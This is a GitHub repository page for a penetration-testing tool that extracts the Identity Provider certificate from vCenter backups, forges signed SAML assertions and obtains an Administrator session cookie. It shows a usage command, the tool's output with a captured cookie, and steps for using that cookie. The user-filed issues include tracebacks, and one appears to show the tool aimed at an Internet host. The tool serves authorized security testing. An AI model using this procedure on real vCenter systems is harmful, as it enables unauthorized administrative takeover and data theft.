A tool to extract the IdP cert from vCenter backups and log in as Administrator

horizon3ai, updated 🕥 2022-12-22 02:36:46

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user - including the builtin Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

[email protected]:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200 [*] Successfully extracted the IdP certificate [*] Successfully extracted trusted certificate 1 [*] Successfully extracted trusted certificate 2 [*] Obtaining hostname from vCenter SSL certificate [*] Found hostname vcsa.olympus for 10.0.100.200 [*] Initiating SAML request with 10.0.100.200 [*] Generating SAML assertion [*] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [+] Successfuly obtained Administrator cookie for 10.0.100.200! [+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https://\\/ui, add the cookie under the /ui path, and re-browse to https://\<VCSA>/ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Issues

Update vcenter_saml_login.py

opened on 2022-12-22 02:36:45 by Blyth0He

bug fix

vSphere 6.7 Error: Exception: expected 302 redirect

opened on 2022-09-25 13:04:39 by TryA9ain

i use vcenter_saml_login.py, but it Error

Then i see the #13 and use it py, but Error too

[-] Failed signing the SAML assertion ('Could not deserialize key data')

opened on 2022-04-11 13:58:22 by corsch

Did anyone else have issues with "Failed signing the SAML assertion"?

``` python3 vcenter_saml_login.py -p data.mdb -t -v [*] Extracted IdP certificate: -----BEGIN PRIVATE KEY----- ... -----END PRIVATE KEY-----

[] Successfully extracted the IdP certificate [!] Looking for cert 1 at position: 69734592 [!] CN end position: 69735640 [] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=.,cn=Tenants,cn=IdentityManager,cn=Seces,dc=,dc= [] Domain: . [!] Cert 1 size: 999 [] Extracted Trusted certificate: -----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----

[] Successfully extracted trusted certificate 1 Cert 2 Size: 1053 [] Extracted Trusted certificate: -----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----

[] Successfully extracted trusted certificate 2 [] Obtaining hostname from vCenter SSL certificate [] Found hostname for [] Initiating SAML request with [] Generating SAML assertion [] Signing the SAML assertion [-] Failed signing the SAML assertion Traceback (most recent call last): File "/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 349, in s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert) File "/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 281, in sign_assertion signed_assertion = signer.sign(root, reference_uri=assertion_id, key=key, cert=[cert1, cert2]) File "/usr/local/lib/python3.9/dist-packages/signxml/init.py", line 398, in sign key = load_pem_private_key(ensure_bytes(key), password=passphrase, backend=default_backend()) File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/primitives/serialization/base.py", line 22, in d_pem_private_key return ossl.load_pem_private_key(data, password) File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 823, in loadm_private_key return self._load_key( File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1070, in _lokey self._handle_key_loading_error() File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1129, in _hae_key_loading_error raise ValueError( ValueError: ('Could not deserialize key data. The data may be in an incorrect format, it may be encrypted with an upported algorithm, or it may be an unsupported key type (e.g. EC curves with explicit parameters).', [_OpenSSLErrithText(code=218529960, lib=13, reason=168, reason_text=b'error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wr tag'), _OpenSSLErrorWithText(code=218546234, lib=13, reason=58, reason_text=b'error:0D06C03A:asn1 encoding routinasn1_d2i_ex_primitive:nested asn1 error'), _OpenSSLErrorWithText(code=218640442, lib=13, reason=58, reason_text=b'or:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error'), _OpenSSLErrorWithText(code=1514987 lib=9, reason=13, reason_text=b'error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib')])

```

I get the same error when trying to "check" the key with openssl:

``` openssl rsa -in private.key -check

unable to load Private Key 139866836145536:error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag:../crypto/asn1/tasn_dec.c:1149: 139866836145536:error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error:../crypto/asn1/tasn_dec.c:713: 139866836145536:error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error:../crypto/asn1/tasn_dec.c:646:Field=version, Type=PKCS8_PRIV_KEY_INFO 139866836145536:error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib:../crypto/pem/pem_pkey.c:88: ```

The decrypted cookie from vcenter 7.0.3 cannot log in to vcenter

opened on 2022-03-31 09:25:50 by qin-9

I decrypt the cookie using the script and can't log in vcenter

Add better validation of keys and certificates

opened on 2022-03-09 15:02:11 by bpg-it-raphaeljohn

This should differentiate better between keys and certificates by adding a validation function for both. Probably fixes #6

Thanks for adding the license.

An error is reported when the script is running

opened on 2022-03-09 07:24:33 by Chinakentgao

[email protected]:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx [] Successfully extracted the IdP certificate [] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local [] Domain: vsphere.local [] Successfully extracted trusted certificate 1 [] Successfully extracted trusted certificate 2 [] Obtaining hostname from vCenter SSL certificate [] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx [] Initiating SAML request with xxx.xx.xxx.xxx [] Generating SAML assertion [] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [-] Failed logging in with SAML request Traceback (most recent call last): File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in c = login(args.target, s) File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login raise Exception("expected 302 redirect") Exception: expected 302 redirect

xxx.xx.xxx.xxx Is an Internet IP

Horizon 3 AI Inc

AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.

GitHub Repository